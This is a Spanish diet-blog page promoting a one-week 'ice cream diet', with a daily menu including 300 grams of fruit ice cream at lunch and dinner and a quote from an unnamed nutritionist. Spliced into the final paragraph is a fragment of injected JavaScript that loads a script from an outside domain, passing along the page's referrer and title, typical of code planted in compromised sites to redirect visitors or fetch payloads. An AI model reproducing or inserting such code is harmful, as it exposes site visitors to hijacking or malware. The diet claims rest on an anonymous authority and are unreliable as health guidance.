Salud y belleza » Dieta

Adelgace comiendo helado

Sin Comentarios

Con la siguiente dieta quedarán helados. Ante todo, permanecerán así, atónitos, debido a la sorpresa que causa conocer un plan alimenticio sustentado en el consumo de un postre y, en segundo caso, también volverán a quedar helados, pues el plato del que se compone la dieta es justamente…el helado.

“El helado varía radicalmente de acuerdo a sus gustos. En sí, la formula básica, no se eleva como un alimento alto en calorías, de hecho, la mayoría de las dietas o incluso muchos hospitales incluyen, entre sus menúes, un poco de helado junto con la clásica gelatina o compota de frutas” afirma un nutricionista famoso y agrega “lo importante es que, a la hora del consumo, prevalezcan los sabores frutales y no se elijan aquellos del denominado grupo chocolatoso o cremoso a excepción de la vainilla que, a pesar de su naturaleza, suele ser un gusto de bajo aporte calórico”.

Como vemos no es solo una mera cuestión publicitaria: el título realmente dice la verdad. Con la denominada dieta del helado, es posible bajar de peso. Naturalmente, y tal cual afirman el especialista en nutrición, de entre todas las opciones aquí no hay lugar para los helados de tramontana, café, tiramisú, mantecado y demás sabores “engordadores” -eso no sería dieta sino milagro-.

Analicemos un menú diario para tener una idea de cómo se compone la dieta del helado:

Desayuno: té o café con tres tostadas integrales con una cucharada de mermelada frutal sin azúcar.

Media mañana: tres o cuatro albaricoques.

Almuerzo: helado frutal, hasta trescientos gramos.

Comida: puré de calabaza con pechuga de pollo (nada de grasa).

Merienda: una fruta a elección.

Cena: una taza de ensalada de vegetales verdes, tres cucharadas de garbanzos, vegetales frescos picados como tomate, cebolla y pepinillos (no más de una taza y media) y media porción de atún en agua. Usar aderezos al gusto, bajos en grasa, aceite de oliva, mayonesa light. De postre, nuevamente trescientos gramos de helado sabor a fruta.

La dieta del helado se compone de una duración semanal y terminado ese lapso se recomienda volver a los hábitos alimenticios de siempre. Aunque, claro, si se quiere continuar con el consumo de helado frutal, no hay ningún problema: pero, desde ya, intenté hacerlo en verano o, en todo caso, dirigirse a nuestra sección especial con remedios caseros para combatir la gripe y el enfriamiento.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; } else {

Más consejos de salud y belleza : , , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.